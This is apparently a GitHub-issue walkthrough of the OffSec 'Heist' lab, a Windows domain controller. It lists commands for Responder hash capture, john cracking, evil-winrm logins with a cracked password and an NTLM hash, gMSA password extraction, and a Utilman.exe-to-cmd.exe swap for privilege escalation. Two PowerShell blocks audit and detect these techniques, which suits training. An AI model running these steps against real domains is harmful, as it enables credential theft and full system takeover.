Open WDavid404 opened 3 months ago
PORT STATE SERVICE REASON VERSION
53/tcp open domain? syn-ack ttl 125
88/tcp open kerberos-sec syn-ack ttl 125 Microsoft Windows Kerberos (server time: 2024-08-09 00:11:38Z)
135/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
139/tcp open netbios-ssn syn-ack ttl 125 Microsoft Windows netbios-ssn
389/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds? syn-ack ttl 125
464/tcp open kpasswd5? syn-ack ttl 125
593/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped syn-ack ttl 125
3268/tcp open ldap syn-ack ttl 125 Microsoft Windows Active Directory LDAP (Domain: heist.offsec0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped syn-ack ttl 125
3389/tcp open ms-wbt-server syn-ack ttl 125 Microsoft Terminal Services
| ssl-cert: Subject: commonName=DC01.heist.offsec
| Issuer: commonName=DC01.heist.offsec
5985/tcp open http syn-ack ttl 125 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
8080/tcp open http syn-ack ttl 125 Werkzeug httpd 2.0.1 (Python 3.9.0)
| http-methods:
|_ Supported Methods: GET HEAD OPTIONS
|_http-title: Super Secure Web Browser
9389/tcp open mc-nmf syn-ack ttl 125 .NET Message Framing
49666/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49667/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49673/tcp open ncacn_http syn-ack ttl 125 Microsoft Windows RPC over HTTP 1.0
49674/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49677/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49707/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
49758/tcp open msrpc syn-ack ttl 125 Microsoft Windows RPC
--> no interesting info
--> no info
rootDomainNamingContext: DC=heist,DC=offsec
ldapServiceName: heist.offsec:dc01$@HEIST.OFFSEC
dnsHostName: DC01.heist.offsec
ldapsearch -H ldap://192.168.173.165 -x -b"DC=heist,DC=offsec"
--> no info
GetNPUsers.py heist.offsec/ -dc-ip $IP
--> no info
--> no interesting info
add domain name (DC01.heist.offsec) to /etc/hosts
search exploit info about Werkzeug httpd 2.0.1 -->
Try accessing our test file in kali --> works
sudo responder -I tun0 -wv
(Need to close our http.server that is using port 80)
Crack the hash: john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
-->california
crackmapexec smb 192.168.173.165 -u enox -p california --continue-on-success
crackmapexec winrm 192.168.173.165 -u enox -p california --continue-on-success -->
evil-winrm -i 192.168.173.165 -u enox -p california
Refer to
whoami /priv --> no interesting info
cmdkey /list --> no credential info
cmd.exe /c dir /a C:\
ls "program files"
icacls "C:\Program Files\nasm-2.24\win64\nssm.exe"
icacls "C:\Program Files\nasm-2.24\win64"
ls "program files (x86)" --> No interesting non-default files / folders.
netstat -nao
--> No ports open internally (127.0.0.1) or ports blocked by the firewall. Seeing only the same ports as the nmap scan.
Nothing juicy was found with PowerUp. Nothing juicy was found with WinPEAS.
sudo /opt/BloodHound_py/bloodhound.py -d heist.offsec -u enox -p california -c all -ns 192.168.164.165
OR
bloodhound-python -d heist.offsec -u enox -p california -c all -ns 192.168.164.165
started both bloodhound and neo4j in separate tabs on my attacker machine.
sudo neo4j console
sudo bloodhound
username:neo4j
password: password
Upload data:
go to "Shortest Paths to High Value Targets"
This shows that the svc_apache service account can read the GMSA password, which means that the svc_apache account is a Group Managed Service Account (gMSA).
PS: On "SVC_APACHE$@HEIST.OFFSEC" --> select "Shortest paths to here"
Bloodhound description reveals a method in which we can extract the hash
Using the following PowerShell command, we can confirm that this account is a service account with GMSA enabled:
Get-ADServiceAccount -Filter * | where-object {$_.ObjectClass -eq "msDS-GroupManagedServiceAccount"}
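As an added defensive check (not part of this write-up), the following PowerShell audits every gMSA in the domain for the principals allowed to retrieve its managed password, which is exactly the edge BloodHound showed for svc_apache; it assumes the RSAT ActiveDirectory module and uses DC01.heist.offsec as the server, and expands group readers to their effective members.

```powershell
# Added example, not part of the original write-up: list which principals may
# retrieve each gMSA's managed password. Assumes the RSAT ActiveDirectory module;
# the default -Server is the DC from this box.
Import-Module ActiveDirectory

function Get-GmsaPasswordReaders {
    param([string]$Server = 'DC01.heist.offsec')
    $query = @{
        Filter     = 'ObjectClass -eq "msDS-GroupManagedServiceAccount"'
        Properties = 'PrincipalsAllowedToRetrieveManagedPassword'
        Server     = $Server
    }
    foreach ($gmsa in Get-ADServiceAccount @query) {
        $readers = @($gmsa.PrincipalsAllowedToRetrieveManagedPassword)
        if ($readers.Count -eq 0) {
            # A gMSA nobody can read is unusual but harmless; still list it.
            [pscustomobject]@{ Gmsa = $gmsa.SamAccountName; Reader = '(none)';
                               ReaderType = ''; EffectiveMembers = '' }
            continue
        }
        foreach ($dn in $readers) {
            $p = Get-ADObject -Identity $dn -Server $Server
            # A group reader means every (nested) member can fetch the password,
            # so expand it: that is the set of accounts that effectively own the gMSA.
            $members = ''
            if ($p.ObjectClass -eq 'group') {
                $members = (Get-ADGroupMember -Identity $dn -Server $Server -Recursive |
                            ForEach-Object SamAccountName) -join ', '
            }
            [pscustomobject]@{
                Gmsa             = $gmsa.SamAccountName
                Reader           = $p.Name
                ReaderType       = $p.ObjectClass
                EffectiveMembers = $members
            }
        }
    }
}

# Review the output for gMSAs readable by ordinary user accounts or broad groups.
Get-GmsaPasswordReaders | Format-Table -AutoSize
```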
GMSAPasswordReader.exe : https://github.com/expl0itabl3/Toolies
.\GMSAPasswordReader.exe --accountname 'svc_apache'
Then,
evil-winrm -i 192.168.164.165 -u svc_apache$ -H 41bcd07b8cc9636826fe07ff9539ca57
SeRestorePrivilege
The SeRestorePrivilege is a special privilege required to restore files and directories. Accounts with this privilege are given write access to all files regardless of the access control list associated with files and directories. This means we can replace any system binary with one of our choosing.
Other reference: https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation/privilege-escalation-abusing-tokens#serestoreprivilege
As in the screenshot above, if Utility Manager can be launched from the logon screen without logging on, then renaming the command prompt executable (cmd.exe) to the Utility Manager executable name (Utilman.exe) should cause a command prompt to start instead of Utility Manager; that is how the trick works.
found the Utilman.exe file using get-childitem cmdlet
get-childitem -path C:\\Windows\\System32\\ -include utilman.exe -file -recurse -erroraction silentlycontinue
back it up: mv C:\Windows\System32\Utilman.exe C:\Windows\System32\Utilman.old
mv cmd.exe Utilman.exe
4. Opened the rdp session using rdesktop: rdesktop $IP
pressed win+u key --> the cmd prompt appeared
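As an added defensive check (not part of this write-up), a PowerShell function that reports whether Utilman.exe on a host has been replaced by cmd.exe as described above, including the Utilman.old backup those steps leave behind; it assumes an elevated session on the host being checked.

```powershell
# Added example, not from the write-up: detect a cmd.exe-for-Utilman.exe swap.
# Assumes it runs in an elevated PowerShell on the host under review.
function Test-UtilmanIntegrity {
    param([string]$System32 = "$env:SystemRoot\System32")
    $utilman = Join-Path $System32 'Utilman.exe'
    $cmd     = Join-Path $System32 'cmd.exe'

    # Decisive signals: identical content to cmd.exe, or a PE whose embedded
    # OriginalFilename says it was built as cmd.exe.
    $hashMatchesCmd = (Get-FileHash -Path $utilman).Hash -eq (Get-FileHash -Path $cmd).Hash
    $orig = (Get-Item $utilman).VersionInfo.OriginalFilename
    # The backup the manual swap leaves behind is an easy tell on its own.
    $leftoverBackup = Test-Path (Join-Path $System32 'Utilman.old')
    # Reported for context only: the Authenticode status stays Valid after the swap,
    # because cmd.exe is itself Microsoft-signed, so it cannot catch this by itself.
    $sig = Get-AuthenticodeSignature -FilePath $utilman

    [pscustomobject]@{
        Path             = $utilman
        SignatureStatus  = $sig.Status
        OriginalFilename = $orig
        HashMatchesCmd   = $hashMatchesCmd
        LeftoverBackup   = $leftoverBackup
        Suspicious       = $hashMatchesCmd -or ($orig -like 'cmd*') -or $leftoverBackup
    }
}

Test-UtilmanIntegrity | Format-List
```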
Key points:
sudo responder -I tun0 -wv